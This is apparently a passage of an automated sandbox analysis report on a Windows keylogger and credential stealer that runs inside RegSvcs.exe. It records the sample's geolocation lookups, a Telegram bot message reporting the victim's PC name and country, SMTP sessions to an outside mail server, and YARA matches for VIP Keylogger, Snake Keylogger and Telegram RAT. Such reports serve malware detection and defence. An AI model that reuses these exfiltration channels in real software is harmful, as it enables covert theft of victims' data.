                                                                                2024-10-10 11:18:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549745188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:20 UTC708INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13793
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swtJtKy5qrIOwZcSsLjZHrzCLsK%2FRUiNO%2BLPOnOPkH%2FsuDeFE3Car1pSlQm9FdZH1x4zNYOFIDlJAs0H2tcCEhqmGWjGa8pCf0Csw79noTumkS4PqIg8n%2BG3qjlWDQpzW6Mtm2Hs"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d06358ad9f50f6b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549759188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:21 UTC702INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:21 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13794
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFmelxm%2F6VVkODCDuSaQ9XqGlWNgcpIzQKbQDXTIuFb8QYpHbrVQuPYebLE2aP0QTDh8066ZfVykLX7Q4Ww3zVm3EHMdrijOXzv8O6moQfhtafA122BAc0TxPFcIWYyYj9pvBFv0"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635927f1f423d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549769188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:23 UTC712INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:23 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13796
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6V1e8lwhEP81f%2B9JZxjnj6gGEcblG7%2Bdes6JFU6oFTP0TIHU%2B8xNIFUHkglhyX1%2B5uaYJkct6wJrL8W3ZXno1OoUi2yIXh2d55vE3CCg2psuAS%2FoEZELddy%2BOtFNdhzXdlD2oDl"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d06359adbeb1998-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549778188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:24 UTC704INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:24 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13797
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPfTx7kAZq32jmeg2ao3qAizxSxkFkRsYQk8N2sRZ8uj2MPLYofAT29kR5ar249JeTa8y5o394JgjziDVEbGsCnkBdGTYNHgPCO0HY%2FP2h5b6PNad6avqIugEUkWUAQw4kGPU%2Frz"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635a28bdb434f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549792188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-10 11:18:25 UTC708INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:25 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13798
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1OZZXHgfaQfYHA52wY8LMYZvoAjdRIgE39FO%2Fwx1uFBupKKnSaNKPyZix0NVo28wy3MgMQDApHGyi%2FJtb23CBel%2FlTpRGgk0tThhJMlsjp7F%2FNstTwTYuPiyt3hCGdhVy2Gt39X6"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635ab797243f1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549804188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:27 UTC710INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:27 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13800
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wznEgNpVMxKQbV2H5LHjiGfQkpGuFd%2B5j%2B06xsJZL0T%2F5%2Fgp8Qiwn3MLswDOgCD4pTek6m54HrxHyZkUU1NaxtTuaLZgm%2Bqe9wDmNx9OcISeBRVrjJyn4yfpTFzlJJNlW7Ca9gtd"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635b39f9241f3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549811188.114.97.34437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-10 11:18:28 UTC706INHTTP/1.1 200 OK
                                                                                Date: Thu, 10 Oct 2024 11:18:28 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 13801
                                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSmUUqR3rycvNuBjr9P9%2F1bAzAAZZguS3yXBoOpWTfLZWorioX7A3Sgyq5EBsf65An4iEpaKD8OzdX2blODerxvPTZNqsZ%2FSfLDrgyFF13ZRBuMdtL7l7kmOhLJ2GOJ%2BqChrXSF1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d0635bc4fb9de97-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-10-10 11:18:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                2024-10-10 11:18:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.549817149.154.167.2204437164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-10 11:18:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2010/10/2024%20/%2018:33:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-10 11:18:29 UTC344INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0
                                                                                Date: Thu, 10 Oct 2024 11:18:29 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-10-10 11:18:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Oct 10, 2024 13:18:36.781529903 CEST5874985546.151.208.21192.168.2.5220 host.ibtikarat.net ESMTP Exim 4.95 Thu, 10 Oct 2024 14:18:36 +0300
                                                                                Oct 10, 2024 13:18:36.781769991 CEST49855587192.168.2.546.151.208.21EHLO 724471
                                                                                Oct 10, 2024 13:18:37.051351070 CEST5874985546.151.208.21192.168.2.5250-host.ibtikarat.net Hello 724471 [8.46.123.33]
                                                                                250-SIZE 52428800
                                                                                250-8BITMIME
                                                                                250-PIPELINING
                                                                                250-PIPE_CONNECT
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-STARTTLS
                                                                                250 HELP
                                                                                Oct 10, 2024 13:18:37.051570892 CEST49855587192.168.2.546.151.208.21STARTTLS
                                                                                Oct 10, 2024 13:18:37.529624939 CEST5874985546.151.208.21192.168.2.5220 TLS go ahead
                                                                                Oct 10, 2024 13:18:43.944750071 CEST5874990146.151.208.21192.168.2.5220 host.ibtikarat.net ESMTP Exim 4.95 Thu, 10 Oct 2024 14:18:44 +0300
                                                                                Oct 10, 2024 13:18:43.944957972 CEST49901587192.168.2.546.151.208.21EHLO 724471
                                                                                Oct 10, 2024 13:18:44.208899021 CEST5874990146.151.208.21192.168.2.5250-host.ibtikarat.net Hello 724471 [8.46.123.33]
                                                                                250-SIZE 52428800
                                                                                250-8BITMIME
                                                                                250-PIPELINING
                                                                                250-PIPE_CONNECT
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-STARTTLS
                                                                                250 HELP
                                                                                Oct 10, 2024 13:18:44.209065914 CEST49901587192.168.2.546.151.208.21STARTTLS
                                                                                Oct 10, 2024 13:18:44.471580982 CEST5874990146.151.208.21192.168.2.5220 TLS go ahead

                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:07:18:06
                                                                                Start date:10/10/2024
                                                                                Path:C:\Users\user\Desktop\SP0npSA64a.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SP0npSA64a.exe"
                                                                                Imagebase:0x400000
                                                                                File size:1'220'337 bytes
                                                                                MD5 hash:EE44A293DA0A4ABB03FCD00A8E1478AE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:07:18:14
                                                                                Start date:10/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SP0npSA64a.exe"
                                                                                Imagebase:0x810000
                                                                                File size:45'984 bytes
                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
